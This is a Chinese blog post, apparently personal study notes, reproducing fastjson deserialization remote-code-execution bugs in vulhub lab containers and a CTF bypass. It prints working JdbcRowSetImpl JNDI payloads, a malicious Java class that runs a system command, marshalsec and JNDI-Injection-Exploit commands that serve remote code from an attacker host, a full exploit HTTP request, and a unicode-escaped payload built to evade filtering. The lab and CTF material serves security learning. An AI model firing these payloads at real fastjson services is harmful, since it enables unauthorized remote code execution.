fastjson漏洞学习及高版本JDK绕过

还是一年前写的文章 继续复现一下

这是两年前写的文章 为了准备面试再翻出来 呜呜呜 3.8号开始搞

前言

fastjson,之前刷安全网站不知道刷到了多少遍。。。终于有机会好好学一下了

漏洞历史

vulhub上有fastjson的两个版本的rce – 1.2.24-rce 1.2.47-rce 具体大家可以参考下面的两篇文章

https://paper.seebug.org/1192/#fastjson_2

https://www.hacking8.com/bug-product/fastjsoon/fastjson%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8.html

由于时间也不是那么多 今天就把两个vulhub上的简单漏洞给切了 (虽然很老了 但总要回顾经典 不是吗?🙄

About fastjson?

image-20211028162843941

可以看到 现在已经出到了1.2.78 版本了

我们可以看到在1.2.69 仍存在反序列化漏洞 :https://snyk.io/vuln/maven:com.alibaba%3Afastjson

在1.2.68 仍存在远程代码执行漏洞:https://nsfocusglobal.com/fastjson-1-2-68-and-earlier-remote-code-execution-vulnerability-threat-alert/

不过也是很久远的事情了 不过很多java开发的网站 可能缺乏管理 并不会去更新fastjson版本 有些没有安全意识的程序员在引用时 可能直接百度

ctrl +c/v 搞了一个老版本的依赖 总之 安全性还是不容忽视的 更何况这玩意还是中国人写的 有些水开发还就喜欢用 废话不多说 直接开搞

漏洞复现

CVE-2019-14540 远程代码执行漏洞分析

首先看一下fastjson怎么运作的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
package test;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.alibaba.fastjson.JSONObject;

public class User {
private int age;
private String name;
public int getAge() {
System.out.println("getAge方法被自动调用!");
return age;
}
public void setAge(int age) {
System.out.println("setAge方法被自动调用!");
this.age = age;
}
public String getName() {
System.out.println("getName方法被自动调用!");
return name;
}
public void setName(String name) {
System.out.println("setName方法被自动调用!");
this.name = name;
}
public static void main(String[] args) {
//使用@type指定该JSON字符串应该还原成何种类型的对象
String userInfo = "{\"@type\":\"test.User\",\"name\":\"b1ue0cean\", \"age\":18}";
//开启setAutoTypeSupport支持autoType
ParserConfig.global.setAutoTypeSupport(true);
//反序列化成User对象
JSONObject user = JSON.parseObject(userInfo);
//User user = (User) JSON.parse(userInfo); 只会调用setXX方法
//System.out.println(user.getName());
}
}

会同时调用 get 和 set 方法 如果函数中存在一些敏感操作,则可能导致漏洞产生

1
JSONObject user = JSON.parseObject(userInfo);

这样只会调用 set 方法

1
User user = (User) JSON.parse(userInfo);

另外,将json中的age元素删除后,使用JSON.parseObject,仍然会调用getAge方法

image-20211028181222165

也就是说parseObject调用全部属性的get方法,和设置属性的set方法

关于JDK高版本下RMI、LDAP+JNDI bypass的一点笔记 - tr1ple - 博客园 (cnblogs.com)

fastjson 1.2.24

感觉在vulhub只能做参考 还是本地搭建一下环境

直接新建个maven项目 然后把从maven仓库中找到的对应depenence扔到pom中就ok了(怎么感觉比php复现还简单

参考了下面这篇文章

https://www.freebuf.com/vuls/208339.html

算了还是现在vulhub上做一遍

image-20211028170449895

搭好环境 估计就是一个很简单的fastjson利用 我们可以发些简单的数据让fastjson搞

还是来关注一下dockerfile 额 看不到dockefile 。。。进去看看

首先就是java的版本

1
2
3
4
root@9c2bc313b52f:/# java -version
openjdk version "1.8.0_102"
OpenJDK Runtime Environment (build 1.8.0_102-8u102-b14.1-1~bpo8+1-b14)
OpenJDK 64-Bit Server VM (build 25.102-b14, mixed mode)

然后jar包放在了 这个目录下

1
2
root@9c2bc313b52f:/usr/src# ls
fastjsondemo.jar

额 就不拉出来反编译了

给的payload就这一句话 我们

1
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit", "autoCommit":true}}

也可以看vulhub官方给的复现

https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce

官方的复现利用了JNDI注入 学习一下

先把这个编译了

1
javac -d xxx\   xxx\exp.java
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import java.lang.Runtime;
import java.lang.Process;

public class exp {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"touch", "/tmp/success"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}

神奇

1
python -m http.server 8888
image-20211103210826798

我们直接把文件用 python 开个端口 给挂上

image-20211103210925717

marshalsec-0.0.3-SNAPSHOT-all.jar · LiBuJie/marshalsec-jar - Gitee.com

这里可以下到编译好的jar包

启动

1
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://127.0.0.1:8888/exp.class" 7777

终于复现成功了 我直接哭死

首先。。。 不能写127.0.0.1!!!

1
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://ip:8888/exp.class" 7777

我tm被坑死 要写ip!!!!!!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
POST / HTTP/1.1
Host: 172.30.192.1:8090
Content-Length: 158
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.30.192.1:8090
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.30.192.1:8090/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://ip:7777/exp",
"autoCommit":true
}
}

包里也要写ip!!!

image-20220621224255524

fastjson 1.2.47

vulhub

启动一个恶意服务器

1
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "curl 0.0.0.0:1" -A "服务器"
1
2
3
4
5
6
7
8
9
10
11
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://192.168.2.5:1099/svkzpz",
"autoCommit":true
}
}

成功执行

绕过

这里我们通过一道CTF题目来分析

香山杯(也不知道是啥比赛)一道题 (github上一位师傅库里的 随便找的)

还是老样子 先看看 pom

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>2.5.4</version>
<relativePath/> <!-- lookup parent from repository -->
</parent>
<groupId>com</groupId>
<artifactId>easy_fastjson</artifactId>
<version>0.0.1-SNAPSHOT</version>
<name>easy_fastjson</name>
<description>easy_fastjson</description>
<properties>
<java.version>1.8</java.version>
</properties>
<dependencies>
<dependency>
<groupId>com.alibaba</groupId>
<artifactId>fastjson</artifactId>
<version>1.2.42</version>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>

<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-test</artifactId>
<scope>test</scope>
</dependency>
</dependencies>

<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>

</project>

除了个fastjson的版本 没啥别的有用的信息

看看别的

image-20230325193123177

怎么说呢 就是先过滤了一些东西

然后调用了 一个函数

image-20230325193204904

一个绕过题目

unicode编码

1
payload={"e":{"\u0040\u0074\u0079\u0070\u0065":"\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073","\u0076\u0061\u006c":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c"},"name":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"rmi://127.0.0.1:1099/3q7sr7","\u0061\u0075\u0074\u006f\u0043\u006f\u006d\u006d\u0069\u0074":true}}

fastjson1.2.68

fastjson1.2.80

https://y4er.com/posts/fastjson-1.2.80/#%E5%9B%9E%E9%A1%BEfastjson%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E

高版本JDK的JNDI注入绕过

Attention

可以先看张图 0.0

在这里插入图片描述

JDK 6u141、7u131、8u121之后:增加了com.sun.jndi.rmi.object.trustURLCodebase选项,默认为false,禁止RMI和CORBA协议使用远程codebase的选项,因此RMI和CORBA在以上的JDK版本上已经无法触发该漏洞,但依然可以通过指定URI为LDAP协议来进行JNDI注入攻击。

JDK 6u211、7u201、8u191之后:增加了com.sun.jndi.ldap.object.trustURLCodebase选项,默认为false,禁止LDAP协议使用远程codebase的选项,把LDAP协议的攻击途径也给禁了。